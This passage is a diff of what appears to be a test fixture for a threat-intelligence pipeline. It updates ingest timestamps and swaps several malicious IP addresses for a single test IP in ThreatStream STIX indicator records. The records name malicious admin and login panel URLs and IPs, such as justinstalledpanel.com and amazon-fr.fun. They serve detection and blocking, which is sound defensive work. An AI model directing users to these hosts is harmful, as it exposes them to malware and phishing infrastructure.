"{\"created\":\"2020-02-20T04:31:26.532Z\",\"description\":\"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.532Z\",\"name\":\"mal_url: http://23.247.102.18/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.532Z\"}", "category": "threat", "type": "indicator", @@ -22634,7 +22634,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388145689Z", + "ingested": "2021-12-13T08:38:40.025390500Z", "original": "{\"created\":\"2020-02-20T04:31:26.582Z\",\"description\":\"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--f43a4d56-b27f-41f0-917b-52358df31e13\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.582Z\",\"name\":\"mal_url: http://23.247.102.18/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.582Z\"}", "category": "threat", "type": "indicator", @@ -22653,7 +22653,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 5.8.88.35", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-20T04:32:16.603Z", "valid_from": "2020-02-20T04:32:16.603Z", @@ -22675,12 +22675,12 @@ "first_seen": "2020-02-20T04:32:16.603Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "5.8.88.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388150218Z", - "original": "{\"created\":\"2020-02-20T04:32:16.603Z\",\"description\":\"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-41\"],\"modified\":\"2020-02-20T04:32:16.603Z\",\"name\":\"mal_ip: 5.8.88.35\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '5.8.88.35']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:16.603Z\"}", + "ingested": "2021-12-13T08:38:40.025397800Z", + "original": "{\"created\":\"2020-02-20T04:32:16.603Z\",\"description\":\"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-41\"],\"modified\":\"2020-02-20T04:32:16.603Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:16.603Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22698,7 +22698,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 2.57.91.231", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-20T04:32:52.041Z", "valid_from": "2020-02-20T04:32:52.041Z", @@ -22720,12 +22720,12 @@ "first_seen": "2020-02-20T04:32:52.041Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "2.57.91.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388154987Z", - "original": "{\"created\":\"2020-02-20T04:32:52.041Z\",\"description\":\"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:32:52.041Z\",\"name\":\"mal_ip: 2.57.91.231\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '2.57.91.231']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.041Z\"}", + "ingested": "2021-12-13T08:38:40.025405200Z", + "original": "{\"created\":\"2020-02-20T04:32:52.041Z\",\"description\":\"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:32:52.041Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.041Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22775,7 +22775,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388159345Z", + "ingested": "2021-12-13T08:38:40.025412400Z", "original": "{\"created\":\"2020-02-20T04:32:52.057Z\",\"description\":\"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:32:52.057Z\",\"name\":\"mal_url: http://lae9ac50.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.057Z\"}", "category": "threat", "type": "indicator", @@ -22826,7 +22826,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388163513Z", + "ingested": "2021-12-13T08:38:40.025419500Z", "original": "{\"created\":\"2020-02-20T04:32:52.074Z\",\"description\":\"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f4447d70-3217-4319-9b89-4439db608f67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-20T04:32:52.074Z\",\"name\":\"mal_url: http://ld01c555.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld01c555.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.074Z\"}", "category": "threat", "type": "indicator", @@ -22878,7 +22878,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388167691Z", + "ingested": "2021-12-13T08:38:40.025426600Z", "original": "{\"created\":\"2020-02-20T04:49:13.452Z\",\"description\":\"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--93e03851-428e-4e25-9fa6-17383426a6d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:49:13.452Z\",\"name\":\"mal_url: http://borrdrillling.com/psm91/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:13.452Z\"}", "category": "threat", "type": "indicator", @@ -22929,7 +22929,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388172159Z", + "ingested": "2021-12-13T08:38:40.025433900Z", "original": "{\"created\":\"2020-02-20T04:49:22.233Z\",\"description\":\"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:49:22.233Z\",\"name\":\"mal_url: http://wtfshop.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wtfshop.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:22.233Z\"}", "category": "threat", "type": "indicator", @@ -22980,7 +22980,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388176617Z", + "ingested": "2021-12-13T08:38:40.025441Z", "original": "{\"created\":\"2020-02-20T04:50:21.678Z\",\"description\":\"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:50:21.678Z\",\"name\":\"mal_url: http://minecrafttusa1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecrafttusa1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.678Z\"}", "category": "threat", "type": "indicator", @@ -22999,7 +22999,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 141.8.194.74", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", "modified": "2020-02-20T04:50:21.708Z", "valid_from": "2020-02-20T04:50:21.708Z", @@ -23021,12 +23021,12 @@ "first_seen": "2020-02-20T04:50:21.708Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "141.8.194.74" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388180926Z", - "original": "{\"created\":\"2020-02-20T04:50:21.708Z\",\"description\":\"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-20T04:50:21.708Z\",\"name\":\"mal_ip: 141.8.194.74\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '141.8.194.74']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.708Z\"}", + "ingested": "2021-12-13T08:38:40.025448100Z", + "original": "{\"created\":\"2020-02-20T04:50:21.708Z\",\"description\":\"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-20T04:50:21.708Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.708Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23044,7 +23044,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.252.11.134", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime", "modified": "2020-02-20T04:50:33.473Z", "valid_from": "2020-02-20T04:50:33.473Z", @@ -23066,12 +23066,12 @@ "first_seen": "2020-02-20T04:50:33.473Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.252.11.134" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388185344Z", - "original": "{\"created\":\"2020-02-20T04:50:33.473Z\",\"description\":\"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-02-20T04:50:33.473Z\",\"name\":\"mal_ip: 47.252.11.134\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.252.11.134']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:33.473Z\"}", + "ingested": "2021-12-13T08:38:40.025455200Z", + "original": "{\"created\":\"2020-02-20T04:50:33.473Z\",\"description\":\"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-02-20T04:50:33.473Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:33.473Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23121,7 +23121,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388189592Z", + "ingested": "2021-12-13T08:38:40.025459200Z", "original": "{\"created\":\"2020-02-20T04:51:08.292Z\",\"description\":\"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-20T04:51:08.292Z\",\"name\":\"mal_url: http://amazon-fr.fun/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amazon-fr.fun/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:51:08.292Z\"}", "category": "threat", "type": "indicator", @@ -23140,7 +23140,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.8.88.68/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-20T05:16:07.933Z", "valid_from": "2020-02-20T05:16:07.933Z", @@ -23164,16 +23164,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.8.88.68/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.8.88.68", - "full": "http://5.8.88.68/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388194020Z", - "original": "{\"created\":\"2020-02-20T05:16:07.933Z\",\"description\":\"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T05:16:07.933Z\",\"name\":\"mal_url: http://5.8.88.68/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.8.88.68/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:07.933Z\"}", + "ingested": "2021-12-13T08:38:40.025464400Z", + "original": "{\"created\":\"2020-02-20T05:16:07.933Z\",\"description\":\"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T05:16:07.933Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:07.933Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23223,7 +23223,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388198178Z", + "ingested": "2021-12-13T08:38:40.025469900Z", "original": "{\"created\":\"2020-02-20T05:16:27.52Z\",\"description\":\"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-20T05:16:27.52Z\",\"name\":\"mal_url: http://f0400017.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400017.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.52Z\"}", "category": "threat", "type": "indicator", @@ -23274,7 +23274,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388202516Z", + "ingested": "2021-12-13T08:38:40.025474900Z", "original": "{\"created\":\"2020-02-20T05:16:27.557Z\",\"description\":\"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--52371067-94be-4a79-b45d-8de115e81e86\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-20T05:16:27.557Z\",\"name\":\"mal_url: http://f0391202.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391202.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.557Z\"}", "category": "threat", "type": "indicator", @@ -23325,7 +23325,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388206744Z", + "ingested": "2021-12-13T08:38:40.025478800Z", "original": "{\"created\":\"2020-02-20T05:16:37.354Z\",\"description\":\"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:16:37.354Z\",\"name\":\"mal_url: http://ld7fa9c9.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:37.354Z\"}", "category": "threat", "type": "indicator", @@ -23344,7 +23344,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 161.117.178.167", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime", "modified": "2020-02-20T05:16:41.613Z", "valid_from": "2020-02-20T05:16:41.613Z", @@ -23366,12 +23366,12 @@ "first_seen": "2020-02-20T05:16:41.613Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "161.117.178.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388211553Z", - "original": "{\"created\":\"2020-02-20T05:16:41.613Z\",\"description\":\"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:16:41.613Z\",\"name\":\"mal_ip: 161.117.178.167\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '161.117.178.167']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:41.613Z\"}", + "ingested": "2021-12-13T08:38:40.025483900Z", + "original": "{\"created\":\"2020-02-20T05:16:41.613Z\",\"description\":\"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:16:41.613Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:41.613Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23422,7 +23422,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388215971Z", + "ingested": "2021-12-13T08:38:40.025491300Z", "original": "{\"created\":\"2020-02-20T05:16:57.739Z\",\"description\":\"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:16:57.739Z\",\"name\":\"mal_url: http://referral-casino.club/1/stats/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://referral-casino.club/1/stats/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.739Z\"}", "category": "threat", "type": "indicator", @@ -23474,7 +23474,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388220149Z", + "ingested": "2021-12-13T08:38:40.025495600Z", "original": "{\"created\":\"2020-02-20T05:16:57.764Z\",\"description\":\"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:16:57.764Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.764Z\"}", "category": "threat", "type": "indicator", @@ -23526,7 +23526,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388224668Z", + "ingested": "2021-12-13T08:38:40.025500200Z", "original": "{\"created\":\"2020-02-20T05:16:57.791Z\",\"description\":\"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-20T05:16:57.791Z\",\"name\":\"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.791Z\"}", "category": "threat", "type": "indicator", @@ -23545,7 +23545,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.98.87.59", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime", "modified": "2020-02-20T05:17:10.129Z", "valid_from": "2020-02-20T05:17:10.129Z", @@ -23567,12 +23567,12 @@ "first_seen": "2020-02-20T05:17:10.129Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.98.87.59" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388229266Z", - "original": "{\"created\":\"2020-02-20T05:17:10.129Z\",\"description\":\"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-20T05:17:10.129Z\",\"name\":\"mal_ip: 185.98.87.59\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.98.87.59']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:17:10.129Z\"}", + "ingested": "2021-12-13T08:38:40.025503700Z", + "original": "{\"created\":\"2020-02-20T05:17:10.129Z\",\"description\":\"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-20T05:17:10.129Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:17:10.129Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23623,7 +23623,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388233634Z", + "ingested": "2021-12-13T08:38:40.025509Z", "original": "{\"created\":\"2020-02-20T05:18:20.205Z\",\"description\":\"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-20T05:18:20.205Z\",\"name\":\"mal_url: http://liweff.eu/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.205Z\"}", "category": "threat", "type": "indicator", @@ -23675,7 +23675,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388238233Z", + "ingested": "2021-12-13T08:38:40.025514700Z", "original": "{\"created\":\"2020-02-20T05:18:20.412Z\",\"description\":\"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:20.412Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.412Z\"}", "category": "threat", "type": "indicator", @@ -23727,7 +23727,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388242621Z", + "ingested": "2021-12-13T08:38:40.025521100Z", "original": "{\"created\":\"2020-02-20T05:18:22.703Z\",\"description\":\"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: 